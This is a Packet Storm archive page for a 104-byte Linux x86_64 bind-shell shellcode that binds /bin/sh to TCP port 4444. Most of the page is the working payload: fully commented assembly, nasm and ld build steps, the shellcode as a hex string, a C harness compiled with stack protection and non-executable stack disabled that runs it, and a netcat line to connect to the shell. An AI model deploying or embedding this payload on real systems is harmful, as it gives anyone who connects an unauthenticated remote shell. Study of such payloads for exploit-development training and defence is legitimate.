exploit the possibilities

Linux/x86_64 TCP/4444 Bindshell Shellcode

Linux/x86_64 TCP/4444 Bindshell Shellcode
Posted Jun 10, 2019
Authored by Aron Mihaljevic

104 bytes small Linux/x86_64 shellcode that binds /bin/sh to TCP/4444.

tags | tcp, shellcode
systems | linux
MD5 | a20f533f17e803a65d3c29e06caff338

Linux/x86_64 TCP/4444 Bindshell Shellcode

Change Mirror Download
;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh) (104 bytes)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length: 104 bytes
;github = https://github.com/STARRBOY
;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"


================== ASSEMBLY ========================================

global _start


section .text

_start:



;create_socket
;int socket(AF_INET, SOCK_STREAM, 0);

push 41 ;sys_socket
pop rax
push 2 ;AF_INET
pop rdi
push 1 ;SOCK_STREAM
pop rsi
xor rdx, rdx
syscall

;save the return value for future use
xchg rdi, rax


; sin_zero: 0
; sin_addr.s_addr: INADDR_ANY = 0
; sin_port: 4444
; sin_family: AF_INET = 2

push 2 ;sin_family = AF_INET
mov word [rsp + 2], 0x5c11 ;port = 4444
push rsp
pop rsi




bind:
;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen);

push 49 ;sys_bind
pop rax
push rsp
pop rsi ;sockaddr stack pointer
push 16 ;sizeof sockaddr
pop rdx
syscall


listen:
;int listen(int sockfd, int backlog);

push 50 ;sys_listen
pop rax
push 1
pop rsi ;backlog = number of clients = 1
syscall


accept:
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);




push 43 ;sys_accept
pop rax
sub rsp, 16 ;size of the structure on the stack
push rsp
pop rsi ;struct sockaddr
push 16 ;length of the address
push rsp ;stack pointer for struct size
pop rdx
syscall


xchg r10, rax ;save client socket in r10, since we won't use that register for any other operation


close:
;int close(int fd);

push 3 ;sys_close
pop rax
push rax ;save 3 on the stack for rsi in dup2
syscall


xchg rdi, r10 ;client socket as first parameter for dup2
pop rsi ;parameter for dup2 = 3

dup2loop:

; int dup2(int oldfd, int newfd);

push 33 ;sys_dup2
pop rax
dec rsi
syscall
loopnz dup2loop



spawn_shell:

;int execve(const char *filename, char *const argv[],char *const envp[]);

xor rsi, rsi ;clear rsi
push rsi ;push null on the stack
mov rdi, 0x68732f2f6e69622f ;/bin//sh in reverse order
push rdi
push rsp
pop rdi ;stack pointer to /bin//sh
mov al, 59 ;sys_execve
cdq ;sign extend of eax
syscall






=======Generate Shellcode==========================================
nasm -felf64 tcp_bind_shell.nasm -o tcp_bind_shell.o
ld tcp_bind_shell.o -o tcp_bind_shell


=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack bind.c -o bind


======================C program=====================================

#include <stdio.h>
#include <string.h>

unsigned char shellcode[]=\
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x48\x31\xd2\x0f\x05"
"\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x11\x5c\x54\x5e\x6a"
"\x31\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x32\x58\x6a\x01"
"\x5e\x0f\x05\x6a\x2b\x58\x48\x83\xec\x10\x54\x5e\x6a\x10"
"\x54\x5a\x0f\x05\x49\x92\x6a\x03\x58\x50\x0f\x05\x49\x87"
"\xfa\x5e\x6a\x21\x58\x48\xff\xce\x0f\x05\xe0\xf6\x48\x31"
"\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54"
"\x5f\xb0\x3b\x99\x0f\x05";


int main(){

printf("length of your shellcode is: %d\n", (int)strlen(shellcode));

int (*ret)() = (int(*)())shellcode;

ret();
}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

June 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    1 Files
  • 2
    Jun 2nd
    2 Files
  • 3
    Jun 3rd
    19 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    15 Files
  • 6
    Jun 6th
    12 Files
  • 7
    Jun 7th
    11 Files
  • 8
    Jun 8th
    1 Files
  • 9
    Jun 9th
    1 Files
  • 10
    Jun 10th
    15 Files
  • 11
    Jun 11th
    15 Files
  • 12
    Jun 12th
    15 Files
  • 13
    Jun 13th
    8 Files
  • 14
    Jun 14th
    16 Files
  • 15
    Jun 15th
    2 Files
  • 16
    Jun 16th
    1 Files
  • 17
    Jun 17th
    18 Files
  • 18
    Jun 18th
    15 Files
  • 19
    Jun 19th
    22 Files
  • 20
    Jun 20th
    15 Files
  • 21
    Jun 21st
    15 Files
  • 22
    Jun 22nd
    2 Files
  • 23
    Jun 23rd
    1 Files
  • 24
    Jun 24th
    23 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close